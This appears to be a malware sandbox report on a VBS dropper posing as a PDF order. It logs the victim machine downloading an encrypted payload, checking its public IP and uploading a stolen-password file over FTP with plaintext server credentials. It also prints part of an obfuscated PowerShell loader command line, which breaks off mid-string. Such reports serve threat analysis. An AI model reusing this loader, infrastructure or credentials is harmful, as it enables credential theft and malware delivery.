Nov 28, 2022 14:53:15.937089920 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:15.977643967 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:15.977685928 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:15.977942944 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.037839890 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.038094044 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.078984976 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.079611063 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.120157957 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.121061087 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.161766052 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.165164948 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.205966949 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.206445932 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.247524023 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.248744965 CET	49726	61313	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.289469957 CET	61313	49726	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.289623976 CET	49726	61313	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.290035009 CET	49725	21	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.334908009 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.335427046 CET	49726	61313	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.335484982 CET	49726	61313	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.376075029 CET	61313	49726	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.376135111 CET	61313	49726	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.376269102 CET	49726	61313	192.168.2.7	185.31.121.136
Nov 28, 2022 14:53:16.376401901 CET	21	49725	185.31.121.136	192.168.2.7
Nov 28, 2022 14:53:16.376513958 CET	49725	21	192.168.2.7	185.31.121.136

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2022 14:52:53.073584080 CET	50024	53	192.168.2.7	8.8.8.8
Nov 28, 2022 14:52:53.413013935 CET	53	50024	8.8.8.8	192.168.2.7
Nov 28, 2022 14:53:00.452600956 CET	49516	53	192.168.2.7	8.8.8.8
Nov 28, 2022 14:53:00.471657038 CET	53	49516	8.8.8.8	192.168.2.7
Nov 28, 2022 14:53:15.682427883 CET	61392	53	192.168.2.7	8.8.8.8
Nov 28, 2022 14:53:15.843619108 CET	53	61392	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 28, 2022 14:52:53.073584080 CET	192.168.2.7	8.8.8.8	0xcbd2	Standard query (0)	qwedft.gq	A (IP address)	IN (0x0001)	false
Nov 28, 2022 14:53:00.452600956 CET	192.168.2.7	8.8.8.8	0x1219	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 28, 2022 14:53:15.682427883 CET	192.168.2.7	8.8.8.8	0xc173	Standard query (0)	ftp.mcmprint.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 28, 2022 14:52:53.413013935 CET	8.8.8.8	192.168.2.7	0xcbd2	No error (0)	qwedft.gq		162.240.62.179	A (IP address)	IN (0x0001)	false
Nov 28, 2022 14:53:00.471657038 CET	8.8.8.8	192.168.2.7	0x1219	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 28, 2022 14:53:00.471657038 CET	8.8.8.8	192.168.2.7	0x1219	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Nov 28, 2022 14:53:00.471657038 CET	8.8.8.8	192.168.2.7	0x1219	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Nov 28, 2022 14:53:00.471657038 CET	8.8.8.8	192.168.2.7	0x1219	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Nov 28, 2022 14:53:00.471657038 CET	8.8.8.8	192.168.2.7	0x1219	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Nov 28, 2022 14:53:15.843619108 CET	8.8.8.8	192.168.2.7	0xc173	No error (0)	ftp.mcmprint.net		185.31.121.136	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

qwedft.gq

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49723	52.20.78.240	443	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49722	162.240.62.179	80	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2022 14:52:53.606096983 CET	393	OUT	GET /Akkant/bwqPIdZhEA125.psm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: qwedft.gq Cache-Control: no-cache
Nov 28, 2022 14:52:53.774775028 CET	394	IN	HTTP/1.1 200 OK Date: Mon, 28 Nov 2022 13:52:52 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade Last-Modified: Mon, 28 Nov 2022 07:41:53 GMT Accept-Ranges: bytes Content-Length: 222272 Data Raw: 40 86 7b 3a c9 40 d2 93 33 f8 31 21 5f 8c 76 3b 43 e7 f2 33 c0 47 28 15 55 e4 ab a5 4b c7 8b 78 84 0a a4 69 2f 93 88 00 fa 40 38 0f 20 c5 3f d4 37 b9 44 7f e0 f3 66 f7 88 12 8f f6 1b 89 57 a5 5e d6 25 61 cf 35 e8 7e b6 27 93 e6 8a 32 29 e7 ce a8 54 20 44 75 8d 7e 19 30 8d 8e 19 b6 2b b9 e2 ca 8c 92 4c 9a 95 0c 03 c0 23 8a 7e 7c 25 d3 84 da 2e dd 6b eb b2 7e 44 cf 2b 83 2c 42 33 1d 3b 6f 37 3b 24 fd 9c 22 a8 dc bd 00 33 4c 10 be e6 f6 68 85 45 ae 15 41 8c 0b 96 f2 8f e2 1b 97 4e dc 0f a2 56 b5 be 29 32 e4 a9 17 da 63 de 7d 5d 4d a9 00 e5 39 aa 9f 03 ac 7c a6 ce 4e 39 ac d8 8c 6b 8e 3b bf 58 29 f2 6a 7d 6d 1e d8 24 1d d9 ce 3a b5 22 29 0f 7f 80 c2 0f d8 e6 a3 8e 57 66 c1 9b 8c ea 5e 9b 37 f3 a0 6a 9f a3 15 5c 79 73 51 c4 66 60 13 d7 28 4d a4 8d 80 72 fa bd 83 25 b6 b3 ca e0 b4 d1 15 dd 2c 06 88 2f 8c 92 32 4e 07 97 f4 6b 2f 54 a5 35 e3 a4 5a d4 58 f8 01 36 5e bb 43 f4 ae 79 9d 36 f5 75 4c 15 f0 94 30 09 ca 68 23 89 9f 7f 45 26 93 4a 0c 79 5b 46 67 c9 01 72 63 7c 38 28 91 d3 7d 4c e4 ea b3 24 11 e5 0a 76 ec d4 c8 ba e5 6a ef 52 83 ea c5 a9 f0 0e c4 8a a5 2f cc b3 d4 21 99 e4 7e 03 3c db 23 3c 66 cc 59 a2 3c 1a 8f 70 55 cc 68 ae e5 4c 34 ae 35 07 08 91 66 33 2e fb 6f 80 04 a7 cc 26 ca d6 57 40 38 4d 64 fb a8 1b cc 64 77 cc 74 fc 7a f9 dc d0 0f 41 30 38 f8 e0 59 14 a7 b9 37 d8 96 b1 4f 63 77 ae f0 e7 64 7d 9c 0a ee 4c ba 63 71 ed 7d 39 3b 73 d7 79 0d 58 2b f3 e8 c1 75 4f 1f 41 5a e3 1d 7d a2 7c 9b a5 83 79 bb 2b bd 2f 42 52 e9 33 45 16 82 b3 a9 32 bd 27 42 61 79 ef 6c 39 bb 95 1c 9f c7 a4 10 0c 7c fc cc d2 a6 45 e9 7c 39 fc 35 92 c9 55 08 53 3b e1 bd d7 2b b1 27 fe 93 ec 7e d0 8f e4 6a 51 00 75 ae 3a 06 e1 41 d9 39 6d 58 8f 06 60 cb 4b cc 01 f2 a9 b8 2a d7 cb fe 32 99 b1 a5 85 b1 47 2b 15 d3 51 12 5f dc 69 e9 90 0d ea 16 cb 83 65 ee 05 a3 e5 a2 ac a9 46 b4 8c 50 01 e3 bd 0d fb 74 b4 52 f0 e7 29 18 df de f7 79 d4 5e 20 ad 21 a5 63 23 cc 30 2e 9a 3d c8 c7 f4 a1 ba a3 e0 03 1c 75 e2 f9 94 d5 45 d1 81 30 e0 37 76 9c 3f 93 31 c9 db 59 13 53 d0 6a 05 29 30 0b 51 b1 ce 18 5d b1 11 ba 43 06 40 93 f1 8f 88 d6 e0 1a 6c 98 45 2e d8 21 be 17 1d 95 c3 6f 7f a8 a1 08 e6 da 41 87 7a 3b c2 08 d1 d5 73 41 4a 0f 2f 9c 72 e5 ca 72 a0 b6 25 12 57 5a b6 ef 39 6b 57 72 a7 8b 71 09 56 49 e0 c9 b5 79 b3 9b 3c 2d 39 29 df f0 d2 50 1a 91 26 a7 4d 56 40 f3 bb b1 52 02 68 94 0e 6c 9a 1d fb c7 7f f8 dc ab 97 b4 b5 32 67 e4 41 b3 bc 5d 9c ce 38 d4 98 68 93 fc 49 df 3d cc 46 2d a1 03 da 12 eb 17 0d 7c b4 9e f1 64 ed aa ff ed f6 67 b4 c0 2b 10 67 cf 99 c4 eb 18 0c 4a 82 38 af 95 7f 7b 91 bd ee d4 79 bc 55 b5 59 8f fb 73 c3 e3 14 9b 4b 60 e0 37 f0 75 b2 20 85 18 74 e1 2b f0 7d a8 53 38 ba 74 a1 7c 72 32 a6 6d 67 b5 2b b9 e6 a5 80 92 4c 90 bf 1f 33 c2 23 a6 7e 7c 25 d7 84 da 3f cb 60 c0 a9 7e 43 d8 d5 82 80 40 2b 16 35 77 9b cb 25 65 97 f8 82 64 bb 54 00 6c 68 d4 a4 87 63 16 49 c5 72 33 e9 09 bb 91 ee 86 5f eb 0a fe 6d e9 76 c7 cb 42 12 8d d6 21 95 07 96 5d 37 35 33 64 e7 36 bf 9e 27 ab 6a 58 cf 62 3b bb 83 c9 6c 96 89 bf 77 2b cd a3 23 ed 1c db 0c 0c d9 ce 30 9d d0 29 0d 74 a1 c3 07 cb d6 fd 8d 7f 66 c7 9b 8a ea 5e 8a 21 d6 f0 72 9f a4 22 a2 78 5f 53 dc 6d 60 14 81 d6 4c a8 8f 97 79 f8 ba 9b df b7 9f c8 cb b6 fa f6 db 04 15 88 2f 86 b8 21 7e c5 94 d8 6b 2d 54 a2 35 e3 b5 4c dd 73 a3 84 31 49 55 42 d8 bc 61 96 36 f2 73 b2 14 cc 96 Data Ascii: @{:@31!_v;C3G(UKxi/@8 ?7DfW^%a5~'2)T Du~0+L#~\|%.k~D+,B3;o7;$"3LhEANV)2c}]M9\|N9k;X)j}m$:")Wf^7j\ysQf`(Mr%,/2Nk/T5ZX6^Cy6uL0h#E&Jy[Fgrc\|8(}L$vjR/!~<#<fY<pUhL45f3.o&W@8MddwtzA08Y7Ocwd}Lcq}9;syX+uOAZ}\|y+/BR3E2'Bayl9\|E\|95US;+'~jQu:A9mX`K*2G+Q_ieFPtR)y^ !c#0.=uE07v?1YSj)0Q]C@lE.!oAz;sAJ/rr%WZ9kWrqVIy<-9)P&MV@Rhl2gA]8hI=F-\|dg+gJ8{yUYsK`7u t+}S8t\|r2mg+L3#~\|%?`~C@+5w%edTlhcIr3_mvB!]753d6'jXb;lw+#0)tf^!r"x_Sm`Ly/!~k-T5Ls1IUBa6s
Nov 28, 2022 14:52:53.774816036 CET	396	IN	Data Raw: 27 02 ca 6f 3b 67 9e 53 47 0d 91 61 ef a9 5e 46 67 2b 53 65 63 37 32 02 82 e3 ff 4f cc f2 b0 24 19 e5 0a 67 fa df e3 a1 e5 6d f8 ac 82 c6 c7 b1 fb 0e 63 9f 5b 22 e0 b1 c3 2a 99 e3 66 fd 3d f7 21 17 64 e7 ba a0 14 0f 8f 70 5f e6 7b 9e e7 4c 77 ae Data Ascii: 'o;gSGa^Fg+Sec72O$gmc["*f=!dp_{Lw5f"8D_h9MddpV\A0#` &M{\|Rm3dk''9XRZ]uOAZ}m/9zE7u(0BaS\|{!4+S}I]H<u(P.y8djY"
Nov 28, 2022 14:52:53.774847031 CET	397	IN	Data Raw: 32 2e ec da 61 b7 ef 00 f3 13 e5 e8 c6 ef 71 2f 64 82 32 8f ae 60 79 91 9b 6e ca 79 bf 51 cb 6a 99 f0 5c f4 e9 3b 1e b5 61 ca b5 c9 7e b2 23 b9 f8 77 de 19 e4 76 ab 57 20 44 7b 8d 7e 48 26 9e 86 21 43 29 b9 e2 ca 9d 9a 53 8b 6b 0d 2f cc 32 8f 69 Data Ascii: 2.aq/d2`ynyQj\;a~#wvW D{~H&!C)Sk/2i1xoL }n9ZA5.VdD~YXr3yd%ZA2-7R]0&V4MKHD&kBp$H86msVJ>q7x1tJsQ\|(Ma)4'*/
Nov 28, 2022 14:52:53.774892092 CET	398	IN	Data Raw: cd 24 e7 6d 4f fc 74 82 3f 4f d3 5e d0 32 6d 5f 90 0f 9e ca 67 c9 16 f8 f6 b2 21 95 cc e5 cc 98 9d ac fb 87 47 2b 11 ff bc 0e 54 dc 7e 85 6d 0c c6 14 d3 88 2d e9 1a a9 19 a3 85 af 24 02 d3 4f 76 08 bd 0a e7 7f 4a 53 cd fa 57 29 df de f3 07 ec 5e Data Ascii: $mOt?O^2m_g!G+T~m-$OvJSW)^ _c#N=~+D<v'm0'&Sp=ZXo}>An/A?oKyHA@Xp=WWvpjWxRhMI\$,2)B\|NMCwzH}1
Nov 28, 2022 14:52:53.774936914 CET	400	IN	Data Raw: 20 9a bb f2 9b b5 d1 15 c6 26 0b 88 26 93 9e cc 4f eb 89 f6 04 43 54 a5 3f cb 2f 58 d6 5e 90 b6 36 5e ad 6b 78 bc 79 9b 1e db 65 4c 13 ff 99 3d 09 c3 70 dd 98 b3 73 3b 2e 93 4a 08 43 97 46 67 29 62 7c 63 3e 25 d6 90 ff fa 77 d0 f3 b0 24 0f e8 0a Data Ascii: &&OCT?/X^6^kxyeL=ps;.JCFg)b\|c>%w$BhPb#6~:1fF/WF/#*j;8n.I@8ILLt8 a{S?Oc}Nocq2![}{^wOiw{wf?~.7u"(!jSj3
Nov 28, 2022 14:52:53.774952888 CET	401	IN	Data Raw: 70 6d 90 0b ce 4e 6f f3 dc a6 aa 59 84 1c 65 d0 4a b3 bb 47 62 cf 05 cf bb 29 89 fc 48 bc cb cd 6a 34 b3 11 d1 15 fa ff f2 51 9a 8b ed 6f ea b5 1e e6 24 64 b3 c0 2b f6 21 93 66 3b 10 5d 07 4a 99 02 8d 86 b6 79 91 91 f6 d4 79 ae 26 cc 48 99 fa 52 Data Ascii: pmNoYeJGb)Hj4Qo$d+!f;]Jyy&HRikq~'])\|RwxqEH%+$jkQD!!UY7p2KLNklBW>Zwft<v,W+M6 /Ha3[/z-5:~(
Nov 28, 2022 14:52:53.774981022 CET	402	IN	Data Raw: 82 b3 84 2a be 26 42 61 f9 ec 6c 39 bf 95 36 9e 99 a7 3a 0d 7c fc c0 d2 a6 45 c4 7c 39 fd 2e e2 cd 55 38 7f 49 84 ca b8 48 a0 0f e7 91 ec 78 da 5c db 6a 51 04 66 a8 44 68 e2 41 dd 15 3c 49 89 78 70 cb 4b c8 6e cc e9 b8 2c 83 35 ff 4c 89 b1 a5 81 Data Ascii: &Bal96:\|E\|9.U8IHx\jQfDhA<IxpKn,5LuaYF-"(VB\P1^ c#!(.tS7\|>.&yHKo5@k)j5qE.Vadp5y;nG%qC\|]}.kWt
Nov 28, 2022 14:52:53.775005102 CET	404	IN	Data Raw: ce 30 bc ad 9b 0d 7e 81 ac b0 d8 e6 f5 89 7b 60 c3 f4 0b ea 5e 91 e9 d2 fe 41 df a3 35 56 6a 7a 79 85 66 60 19 49 28 67 c5 91 80 72 f8 bd 83 21 b6 b3 ca e0 50 d0 15 d9 c8 07 88 2f 83 92 32 4e ea 94 f4 6a 36 64 af 35 5b a4 5a d6 45 b8 84 27 20 87 Data Ascii: 0~{`^A5Vjzyf`I(gr!P/2Nj6d5[ZE' CQ4cN=0#&&K~%kg)M78,qO$^ARg#&Vi>%Y=d}hd5gf3$<*#L8MurU$,y wok].UE
Nov 28, 2022 14:52:53.775038958 CET	405	IN	Data Raw: 5a 1d a7 15 16 5b 78 b3 80 fd 6a 57 78 d9 58 7a 22 47 5a f3 f5 02 69 8b f6 69 26 39 24 e1 5f d3 7c 12 95 21 b6 4c 49 a8 f5 19 04 16 96 43 77 7a 65 8b 11 f1 ad 64 f4 b3 67 bd a7 8f 18 a0 c8 41 b9 af 55 b4 b8 29 c2 99 52 82 93 39 c8 c3 c7 79 24 a8 Data Ascii: Z[xjWxXz"GZii&9$_\|!LICwzedgAU)R9y$ld3JJ3^mx+H,I;~-u:gQ#JqY01+L%zj4mAKkoB="\5pILkliNr9r<jgE}7=2
Nov 28, 2022 14:52:53.775075912 CET	406	IN	Data Raw: b7 64 53 e2 70 9c b4 f8 63 71 d8 0e 6a 3b 73 fd 51 c8 5a 77 f6 c0 91 77 4f 15 56 72 7a 1d 7d a4 54 cb a5 83 73 a4 01 31 6d 22 7c 9a 68 67 75 82 b9 81 ec bc 27 44 49 a9 ec 6c 33 a7 bd 85 9f 99 a1 38 5c 7c fc c6 cd ac c9 ab 7c 39 fd 1d 82 c9 55 42 Data Ascii: dSpcqj;sQZwwOVrz}Ts1m"\|hgu'DIl38\\|\|9UBUC+myw<A=EwjPF+>{k)>i#/W"?[V~"x\7!{,?$/tO0=^?;[U$;#wI$;5]
Nov 28, 2022 14:52:53.943191051 CET	408	IN	Data Raw: 68 ff 84 c7 cb 47 12 9c c2 20 60 2d a1 5e 28 31 c8 65 da 31 be 6b 26 80 75 d5 4c 4e 39 a6 85 d3 78 8b 77 af 5e 37 18 a0 24 12 17 de 2c 92 9e ce 3a b4 ea f3 0f 7e 8d eb eb d8 e6 f5 e2 ba 66 c7 91 aa f5 57 88 32 dd ca 6c 83 5d 34 70 65 7b 49 99 70 Data Ascii: hG `-^(1e1k&uLN9xw^7$,:~fW2l]4pe{Ip.3Z} 91/)@cH0_QFVT"f%e]j1%jO%=yQ)){{i.+-U(qWe+m<&!u52rUCL>+w68n#R_3

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49723	52.20.78.240	443	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Timestamp	Direction	Data
2022-11-28 13:53:02 UTC	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Host: api.ipify.org Connection: Keep-Alive
2022-11-28 13:53:02 UTC	IN	HTTP/1.1 200 OK Server: Cowboy Connection: close Content-Type: text/plain Vary: Origin Date: Mon, 28 Nov 2022 13:53:02 GMT Content-Length: 14 Via: 1.1 vegur
2022-11-28 13:53:02 UTC	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 Data Ascii: 102.129.143.49

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 28, 2022 14:53:15.934382915 CET	21	49725	185.31.121.136	192.168.2.7	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Nov 28, 2022 14:53:15.937089920 CET	49725	21	192.168.2.7	185.31.121.136	USER klogz@mcmprint.net
Nov 28, 2022 14:53:15.977685928 CET	21	49725	185.31.121.136	192.168.2.7	331 User klogz@mcmprint.net OK. Password required
Nov 28, 2022 14:53:15.977942944 CET	49725	21	192.168.2.7	185.31.121.136	PASS l9Hh{#_(0shZ
Nov 28, 2022 14:53:16.037839890 CET	21	49725	185.31.121.136	192.168.2.7	230 OK. Current restricted directory is /
Nov 28, 2022 14:53:16.078984976 CET	21	49725	185.31.121.136	192.168.2.7	504 Unknown command
Nov 28, 2022 14:53:16.079611063 CET	49725	21	192.168.2.7	185.31.121.136	PWD
Nov 28, 2022 14:53:16.120157957 CET	21	49725	185.31.121.136	192.168.2.7	257 "/" is your current location
Nov 28, 2022 14:53:16.121061087 CET	49725	21	192.168.2.7	185.31.121.136	CWD /
Nov 28, 2022 14:53:16.161766052 CET	21	49725	185.31.121.136	192.168.2.7	250 OK. Current directory is /
Nov 28, 2022 14:53:16.165164948 CET	49725	21	192.168.2.7	185.31.121.136	TYPE I
Nov 28, 2022 14:53:16.205966949 CET	21	49725	185.31.121.136	192.168.2.7	200 TYPE is now 8-bit binary
Nov 28, 2022 14:53:16.206445932 CET	49725	21	192.168.2.7	185.31.121.136	PASV
Nov 28, 2022 14:53:16.247524023 CET	21	49725	185.31.121.136	192.168.2.7	227 Entering Passive Mode (185,31,121,136,239,129)
Nov 28, 2022 14:53:16.290035009 CET	49725	21	192.168.2.7	185.31.121.136	STOR PW_user-724536_2022_11_28_14_53_14.html
Nov 28, 2022 14:53:16.334908009 CET	21	49725	185.31.121.136	192.168.2.7	150 Accepted data connection
Nov 28, 2022 14:53:16.376401901 CET	21	49725	185.31.121.136	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.041 seconds (measured here), 11.13 Kbytes per second

Target ID:	0
Start time:	14:50:11
Start date:	28/11/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
Imagebase:	0x7ff650880000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	1
Start time:	14:50:12
Start date:	28/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD.EXE /c echo C:\Windows
Imagebase:	0x7ff7651b0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	14:50:13
Start date:	28/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	14:50:18
Start date:	28/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKllHaaUptNa)Co;La[BaDHelNelUnIDimRapChoGrrGetTi(mi`"""cogRadPaiTe3Ba2Ho`"""Un)no]OppSwuWhbXelRuikucBi UnsMatFraJotSoiIscAs SoeWoxPitSyeKvrSenSt DiisanEptDa PaGAfeMbtFlCHylAfiSaptaRCagEnnKa(koiBenPatCa KaRSeuEklEnaYa,PsiSknWatMi BlLNiiKnkInvLa1Bl0Fo4Ru)Sy;Ra[AlDArlAblPrILimBepdeotirSetJa(pa`"""BauPasEdeSkrps3me2Gi`"""De)In]UdpInuBlbuolUniTmcUn FrsVitStaChtNoiBucAn AneTaxEttIneobrTanHj EtiArnSktSn KaGsueChtSnCOpllaiCaeSonNitBuRPaeClcUntUd(DeiCanAstEp UpdSaeGoslu,MiiUmnFotHe 